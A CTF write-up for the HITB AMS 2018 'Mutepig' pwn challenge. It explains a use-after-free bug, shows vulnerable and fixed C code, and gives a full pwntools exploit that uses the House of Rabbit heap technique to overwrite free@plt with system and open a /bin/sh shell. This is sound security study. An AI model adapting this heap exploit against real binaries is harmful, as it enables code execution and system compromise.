XCTF HITB AMS 2018 PWN Mutepig Write-up

Introduction

This challenge seems to be the first appearance of House of Rabbit in a CTF competition. The challenge follows the sample code given in [1]. More details on House of Rabbit are given in my previous post, House-of-Rabbit.

Vulnerability Analysis

There is a classic use-after-free vulnerability in the delete function: the buffer is freed, but its entry is not removed from the list, so later operations on that index act on freed memory.
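As an added illustration of the bug class described above (not the challenge's own code; the entry table, field names and sizes are assumptions), here is the list-management pattern with the dangling entry beside a corrected delete that unlinks the entry before freeing:

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical entry table; layout and sizes are assumptions, not the
 * challenge binary's own code. */
#define MAX_ENTRIES 8
typedef struct { char *buf; size_t size; } entry_t;
static entry_t entries[MAX_ENTRIES];

static int entry_is_live(int idx) {
    return idx >= 0 && idx < MAX_ENTRIES && entries[idx].buf != NULL;
}

/* create: take the first empty slot, return its index or -1. */
static int create(size_t size) {
    for (int i = 0; i < MAX_ENTRIES; i++) {
        if (entries[i].buf != NULL) continue;
        entries[i].buf = calloc(1, size);
        if (entries[i].buf == NULL) return -1;
        entries[i].size = size;
        return i;
    }
    return -1;
}

/* Vulnerable delete: the chunk is freed but the entry stays in the list,
 * so later modify()/delete() on the same index act on freed memory. */
static int delete_buggy(int idx) {
    if (!entry_is_live(idx)) return -1;
    free(entries[idx].buf);
    return 0;                       /* entries[idx].buf now dangles */
}

/* Fixed delete: unlink the entry first, then release the chunk. */
static int delete_fixed(int idx) {
    if (!entry_is_live(idx)) return -1;
    char *p = entries[idx].buf;
    entries[idx].buf = NULL;
    entries[idx].size = 0;
    free(p);
    return 0;
}

/* modify only writes through live entries; a cleared slot is refused. */
static int modify(int idx, const char *data, size_t len) {
    if (!entry_is_live(idx) || len > entries[idx].size) return -1;
    memcpy(entries[idx].buf, data, len);
    return 0;
}
```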

Exploit Plan

Since there is no output function at all, we cannot leak any address, so we use House of Rabbit to overwrite the function pointer at free@plt with 0x4006e0 and trigger system("/bin/sh") at the end.

Exploit

from pwn import *
import sys
import time

# usage: python exploit.py <DEBUG>  (0 = remote, 1 = local, 2 = local + gdb)
DEBUG = int(sys.argv[1])

if DEBUG == 0:
    r = remote("1.2.3.4", 2333)
elif DEBUG == 1:
    r = process("./mutepig")
elif DEBUG == 2:
    r = process("./mutepig")
    gdb.attach(r, '''source ./script''')

# sizeoption:
#   1: fast  (0x10)
#   2: small (0x80)
#   3: large (0xa00000)
#   13337: magic
#   else: negative

def create(sizeoption, payload):
    # menu option 1; the 7-byte field is NUL-padded
    time.sleep(0.2)
    r.sendline("1")
    r.sendline(str(sizeoption))
    r.send(payload.ljust(7, '\x00'))

def delete(index):
    # menu option 2; frees the buffer but leaves the entry in the list
    time.sleep(0.2)
    r.sendline("2")
    r.sendline(str(index))

def modify(index, payload1, payload2):
    # menu option 3; works on freed entries too (the UAF)
    time.sleep(0.2)
    r.sendline("3")
    r.sendline(str(index))
    r.send(payload1.ljust(0x7, '\x00'))
    r.send(payload2)

def exploit():
    create(3, "A"*4)  #0
    delete(0)
    create(3, "B"*4)  #1
    delete(1)

    create(1, "C"*4)  #2
    create(2, "D"*4)  #3

    delete(2)

    # entry 2 is freed but still listed, so it can still be modified
    modify(2, p32(0x602130), p64(0) + p64(0x11) + p64(0) + p64(0xfffffffffffffff1))

    delete(3)

    modify(3, "E"*4, p64(0xfffffffffffffff0) + p64(0x10) + p64(0x0) + p64(0xa00001))

    create(3, "F"*4)

    modify(3, "G"*4, p64(0xfffffffffffffff0) + p64(0x10) + p64(0x0) + p64(0xfffffffffffffff1))

    create(13337, "/bin/sh")

    create(1, p32(0x602018))  #0

    modify(0, p32(0x4006e0), p64(0))

    modify(6, "/bin/sh", p64(0))
    delete(6)
    r.interactive()

exploit()

Reference

[1] http://shift-crops.hatenablog.com/entry/2017/09/16/001126

Categories: pwn
